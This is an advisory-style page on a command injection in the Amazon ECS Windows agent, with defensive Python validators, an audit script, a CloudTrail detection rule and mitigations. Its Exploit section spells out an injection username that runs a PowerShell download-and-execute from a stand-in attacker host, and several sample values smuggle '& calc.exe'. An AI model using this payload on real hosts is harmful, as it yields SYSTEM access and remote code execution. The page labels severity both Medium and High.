Amazon ECS (Windows), Command Injection, CVE-unknown (Medium)


How the mentioned CVE works:

The vulnerability affects the Amazon ECS agent for Windows, versions 1.47.0 through 1.102.2 as reported, and stems from improper input validation when the agent mounts an FSx for Windows File Server volume declared in a task definition. Such a volume's authorizationConfig names a credentialsParameter: a Secrets Manager secret or SSM parameter holding a JSON document with the username and password the agent uses to mount the share. The agent fetches that document with the task's execution role and interpolates the username into an OS command run on the Windows host without neutralizing shell metacharacters. An attacker who can write that secret or parameter, or register a task definition that points at a credentials entry they control, and then run a task that uses the volume, therefore gets arbitrary command execution. The injection happens on the host during the mount phase, before any container is created, and the agent service runs as SYSTEM, so the attacker inherits SYSTEM on the container instance. No user interaction is needed beyond the ability to register and run the task. Fargate and Linux container instances are not affected. The reported fix, agent version 1.103.0, sanitizes the credential fields and passes them as separate command arguments instead of building a single shell string.
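To make the mechanism concrete, here is an added illustration that is not the ECS agent's own code: the exact command the agent runs is not given on this page, so a net use shape is assumed, and the hostile username is constructed. It contrasts the pre-fix pattern (the username from the credentials secret concatenated into one shell string) with the post-fix pattern the fix description implies (validate the value, then pass each value as its own process argument):

```python
"""Illustrative reconstruction of the bug class, not the ECS agent's code.
The 'net use' command shape is an assumption; nothing here is executed."""
import re
import subprocess  # only list2cmdline is used, to show how argv is quoted

# Characters cmd.exe treats as command separators, redirection, escapes or
# variable expansion.  None of them belongs in DOMAIN\user or user@domain.
CMD_METACHARACTERS = re.compile(r'[&|<>^()"%!\r\n]')


def build_mount_vulnerable(share: str, username: str, password: str) -> str:
    """Pre-fix pattern (assumed): one string later handed to a shell."""
    return f'net use {share} /user:{username} {password}'


def injected_commands(command_line: str) -> list:
    """Approximate cmd.exe's view of that string: '&' ends one command and
    starts the next, so everything after it runs as a separate program."""
    return [part.strip() for part in command_line.split('&') if part.strip()]


def validate_username(username: str) -> str:
    """Reject any username cmd.exe could reinterpret; return it unchanged otherwise.
    Quoting alone is not enough because cmd.exe still expands %VAR% inside quotes."""
    if not username or CMD_METACHARACTERS.search(username):
        raise ValueError(f'username contains shell metacharacters: {username!r}')
    return username


def build_mount_safe(share: str, username: str, password: str) -> list:
    """Post-fix pattern: validated value, and each argument is its own argv
    element for CreateProcess with no shell (the 'argument separation' the fix describes)."""
    return ['net', 'use', share, f'/user:{validate_username(username)}', password]


def quoted_command_line(argv: list) -> str:
    """How Python quotes argv for CreateProcess: a '&' stays inside one quoted argument."""
    return subprocess.list2cmdline(argv)


if __name__ == '__main__':
    share, password = r'\\fs-0123456789abcdef0.corp.example.com\share', 'Passw0rd'
    hostile = r'CORP\svc & calc.exe'   # constructed malicious username
    print(injected_commands(build_mount_vulnerable(share, hostile, password)))
    try:
        build_mount_safe(share, hostile, password)
    except ValueError as exc:
        print('rejected:', exc)
    print(build_mount_safe(share, r'CORP\svc', password))
```

Running the script shows the vulnerable string splitting into two commands, the validator rejecting the hostile value, and the benign value surviving as a single argv element.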

dailycve form:

Platform: ECS Windows
Version: 1.47.0-1.102.2
Vulnerability: Command injection
Severity: High
date: 2025-05-07

Prediction: Patch already available

What Undercode Say:

Check the agent version on a Windows container instance (the agent's introspection endpoint on the host, or the registry key the original check used)
Invoke-RestMethod http://localhost:51678/v1/metadata | Select-Object Version
Get-ItemProperty -Path "HKLM:\Software\Amazon\ECS" | Select-Object AgentVersion
Simulate a malformed username (educational, on a host you own): the username lives in the credentials JSON that the FSx volume's credentialsParameter points at, not in the task definition itself
{"username": "admin & calc.exe", "password": "<password>"}
When an unpatched agent mounts a volume that references this entry, the text after the & runs as SYSTEM on the host
List task definitions that declare FSx Windows volumes (filtering the ARN list for 'fsx' only matches family names, so inspect each definition's volumes instead)
aws ecs list-task-definitions --query "taskDefinitionArns[]" --output text | xargs -n1 -I{} aws ecs describe-task-definition --task-definition {} --query "taskDefinition.{arn:taskDefinitionArn,fsxVolumes:volumes[?fsxWindowsFileServerVolumeConfiguration].name}"
Audit which principals can register task definitions and run tasks (repeat for each principal under review)
aws iam simulate-principal-policy --policy-source-arn arn:aws:iam::123456789012:user/attacker --action-names ecs:RegisterTaskDefinition ecs:RunTask
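The version check and the task-definition review above can be scripted together. The following is an added audit helper, not Amazon's tooling: it decides whether an agent version string falls in the affected range this page gives, walks task definitions for FSx Windows volumes, and pulls the username out of each referenced credentials entry to flag cmd.exe metacharacters. The task definitions and secret values are constructed samples shaped like aws ecs describe-task-definition and aws secretsmanager get-secret-value output; replace the two constants with boto3 calls to run it against an account.

```python
"""Added audit helper (not Amazon's code).  Sample data is constructed."""
import json
import re
from typing import Dict, List

AFFECTED_MIN = (1, 47, 0)      # affected range as quoted by this advisory
AFFECTED_MAX = (1, 102, 2)
CMD_METACHARACTERS = re.compile(r'[&|<>^()"%!\r\n]')

# Constructed: shaped like describe-task-definition output (only the fields used here).
SAMPLE_TASK_DEFINITIONS = [
    {'taskDefinitionArn': 'arn:aws:ecs:us-east-1:123456789012:task-definition/web:3',
     'volumes': []},
    {'taskDefinitionArn': 'arn:aws:ecs:us-east-1:123456789012:task-definition/reports:7',
     'volumes': [{'name': 'reports', 'fsxWindowsFileServerVolumeConfiguration': {
         'fileSystemId': 'fs-0123456789abcdef0', 'rootDirectory': 'reports',
         'authorizationConfig': {
             'credentialsParameter': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx/reports-AbCdEf',
             'domain': 'corp.example.com'}}}]},
    {'taskDefinitionArn': 'arn:aws:ecs:us-east-1:123456789012:task-definition/build:12',
     'volumes': [{'name': 'shared', 'fsxWindowsFileServerVolumeConfiguration': {
         'fileSystemId': 'fs-0123456789abcdef0', 'rootDirectory': 'shared',
         'authorizationConfig': {
             'credentialsParameter': 'arn:aws:ssm:us-east-1:123456789012:parameter/fsx/build',
             'domain': 'corp.example.com'}}}]},
]
# Constructed: credentialsParameter -> SecretString / parameter value (JSON with username and password).
SAMPLE_SECRETS = {
    'arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx/reports-AbCdEf':
        json.dumps({'username': 'svc-reports', 'password': 'x'}),
    'arn:aws:ssm:us-east-1:123456789012:parameter/fsx/build':
        json.dumps({'username': r'CORP\svc-build & calc.exe', 'password': 'x'}),  # hostile value
}


def parse_version(version: str) -> tuple:
    """Pull x.y.z out of '1.102.2' or an introspection string such as
    'Amazon ECS Agent - v1.102.2 (abcdef0)'."""
    m = re.search(r'(\d+)\.(\d+)\.(\d+)', version)
    if not m:
        raise ValueError(f'no version number in {version!r}')
    return tuple(int(g) for g in m.groups())


def is_affected_version(version: str) -> bool:
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def fsx_volumes(task_def: dict):
    """Yield (volume name, credentialsParameter) for every FSx Windows volume."""
    for vol in task_def.get('volumes') or []:
        cfg = vol.get('fsxWindowsFileServerVolumeConfiguration')
        if cfg:
            yield vol['name'], cfg['authorizationConfig']['credentialsParameter']


def audit(task_defs: List[dict], secrets: Dict[str, str]) -> List[Dict]:
    """One finding per FSx volume; 'suspicious' is set when the stored
    username contains characters cmd.exe would interpret."""
    findings = []
    for td in task_defs:
        for vol_name, cred_arn in fsx_volumes(td):
            raw = secrets.get(cred_arn)
            username = json.loads(raw).get('username', '') if raw else ''
            findings.append({
                'taskDefinition': td['taskDefinitionArn'],
                'volume': vol_name,
                'credentialsParameter': cred_arn,
                'username': username,
                'suspicious': bool(CMD_METACHARACTERS.search(username)),
            })
    return findings


if __name__ == '__main__':
    for v in ('1.46.9', '1.47.0', 'Amazon ECS Agent - v1.102.2 (abcdef0)', '1.103.0'):
        print(v, '->', 'affected' if is_affected_version(v) else 'not affected')
    for finding in audit(SAMPLE_TASK_DEFINITIONS, SAMPLE_SECRETS):
        print(finding)
```

A suspicious username is worth treating as an indicator on its own: a legitimate FSx credential never needs a shell metacharacter, so any hit points at either tampering or a test someone forgot to clean up.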

Exploit:

The attacker needs ecs:RegisterTaskDefinition and ecs:RunTask (or ecs:StartTask) against a cluster with Windows container instances, plus control over the username the agent will read: either write access (secretsmanager:PutSecretValue or ssm:PutParameter) to the credentials entry an existing FSx volume references, or iam:PassRole for a task execution role that can read a secret or parameter the attacker controls. Store a username such as "DOMAIN\user & powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')" in that credentials JSON, register a task definition with an FSx Windows volume that references it, and run a task on an unpatched Windows container instance. When the agent builds the mount command (a net use style invocation, per the report) the text after the & runs as a second command with the SYSTEM privileges of the agent service, before any container is created.

Protection from this CVE:

Upgrade the ECS agent to 1.103.0 or later, or move to the latest Amazon ECS-optimized Windows AMI, and confirm the version on every Windows container instance. Until then: restrict ecs:RegisterTaskDefinition and ecs:RunTask to trusted IAM principals (with condition keys where your policy model supports them); restrict write access (PutSecretValue, PutParameter) to the secrets and parameters referenced by FSx volume configurations, and keep the task execution roles that read them scoped to exactly those entries; alert in CloudTrail on RegisterTaskDefinition calls that introduce an fsxWindowsFileServerVolumeConfiguration and on writes to the referenced credentials; and do not schedule untrusted workloads on Windows container instances that also host sensitive tasks, since a successful injection runs on the host itself.
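The CloudTrail monitoring suggested above can be expressed as a small rule. The following is an added detection example, not from the advisory or from AWS: it evaluates CloudTrail records for RegisterTaskDefinition calls that attach an FSx Windows File Server volume and for writes to the secret or SSM parameter such volumes take their username from. The allowlists and the records in SAMPLE_TRAIL are constructed for the example; field names follow the CloudTrail record format, with requestParameters mirroring each API's input.

```python
"""Added CloudTrail detection example (not AWS or Undercode code).
Allowlists and sample records are constructed."""
import json
from typing import List, Optional

# Constructed allowlists: who may register FSx-backed task definitions, which
# credentials entries are vetted, and who may rewrite them.
APPROVED_REGISTRANTS = {'arn:aws:iam::123456789012:role/ci-deploy'}
FSX_CREDENTIAL_PARAMS = {
    'arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx/reports-AbCdEf'}
APPROVED_SECRET_WRITERS = {'arn:aws:iam::123456789012:role/secrets-admin'}

# Constructed records, one JSON object per line, trimmed to the fields used here.
SAMPLE_TRAIL = """
{"eventSource":"ecs.amazonaws.com","eventName":"RegisterTaskDefinition","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/ci-deploy/pipeline","sessionContext":{"sessionIssuer":{"arn":"arn:aws:iam::123456789012:role/ci-deploy"}}},"requestParameters":{"family":"reports","volumes":[{"name":"reports","fsxWindowsFileServerVolumeConfiguration":{"fileSystemId":"fs-0123456789abcdef0","rootDirectory":"reports","authorizationConfig":{"credentialsParameter":"arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx/reports-AbCdEf","domain":"corp.example.com"}}}]}}
{"eventSource":"ecs.amazonaws.com","eventName":"RegisterTaskDefinition","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/contractor"},"requestParameters":{"family":"build","volumes":[{"name":"shared","fsxWindowsFileServerVolumeConfiguration":{"fileSystemId":"fs-0123456789abcdef0","rootDirectory":"shared","authorizationConfig":{"credentialsParameter":"arn:aws:ssm:us-east-1:123456789012:parameter/scratch/creds","domain":"corp.example.com"}}}]}}
{"eventSource":"secretsmanager.amazonaws.com","eventName":"PutSecretValue","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/contractor"},"requestParameters":{"secretId":"arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx/reports-AbCdEf"}}
{"eventSource":"ecs.amazonaws.com","eventName":"RegisterTaskDefinition","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/contractor"},"requestParameters":{"family":"web","containerDefinitions":[{"name":"web","image":"mcr.microsoft.com/windows/servercore/iis:windowsservercore-ltsc2022"}]}}
"""


def principal(event: dict) -> str:
    """Resolve the IAM principal: the role behind an assumed-role session, else the caller ARN."""
    ident = event.get('userIdentity') or {}
    issuer = (ident.get('sessionContext') or {}).get('sessionIssuer') or {}
    return issuer.get('arn') or ident.get('arn') or 'unknown'


def fsx_credential_params(request_parameters: dict) -> List[str]:
    """credentialsParameter of every FSx Windows volume in a RegisterTaskDefinition request."""
    return [v['fsxWindowsFileServerVolumeConfiguration']['authorizationConfig']['credentialsParameter']
            for v in request_parameters.get('volumes') or []
            if v.get('fsxWindowsFileServerVolumeConfiguration')]


def evaluate(event: dict) -> Optional[str]:
    """Return a finding for a suspicious record, None for an expected one."""
    actor = principal(event)
    source, name = event.get('eventSource'), event.get('eventName')
    params = event.get('requestParameters') or {}
    if source == 'ecs.amazonaws.com' and name == 'RegisterTaskDefinition':
        creds = fsx_credential_params(params)
        if not creds:
            return None                       # no FSx volume: out of scope for this rule
        if actor not in APPROVED_REGISTRANTS:
            return f'unapproved principal {actor} registered FSx task definition {params.get("family")}'
        unvetted = [c for c in creds if c not in FSX_CREDENTIAL_PARAMS]
        if unvetted:
            return f'{actor} pointed family {params.get("family")} at unvetted credentials {unvetted}'
        return None
    if source == 'secretsmanager.amazonaws.com' and name == 'PutSecretValue':
        target = params.get('secretId')
    elif source == 'ssm.amazonaws.com' and name == 'PutParameter':
        target = params.get('name')
    else:
        return None
    if target in FSX_CREDENTIAL_PARAMS and actor not in APPROVED_SECRET_WRITERS:
        return f'{actor} rewrote FSx credentials {target}'
    return None


def scan(json_lines: str) -> List[str]:
    """Evaluate one CloudTrail record per line and keep only the findings."""
    return [finding
            for finding in (evaluate(json.loads(line)) for line in json_lines.splitlines() if line.strip())
            if finding]


if __name__ == '__main__':
    for finding in scan(SAMPLE_TRAIL):
        print(finding)
```

On real trails the same rule runs over the JSON records in a CloudTrail Lake query, an Athena table, or the event stream EventBridge delivers; the only account-specific pieces are the three allowlists.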

Impact:

A remote, authenticated attacker gains SYSTEM on the Windows container instance. Because the injected command runs on the host before any container starts, no container escape is needed: every task scheduled on that instance, the secrets and credentials present on the host, and host resources are exposed, and the node becomes a pivot for lateral movement. If the instance runs critical services or the credentials found on it reach other nodes, the compromise can extend cluster-wide. All workloads on the affected instance must be treated as compromised.


Sources:

Reported By: github.com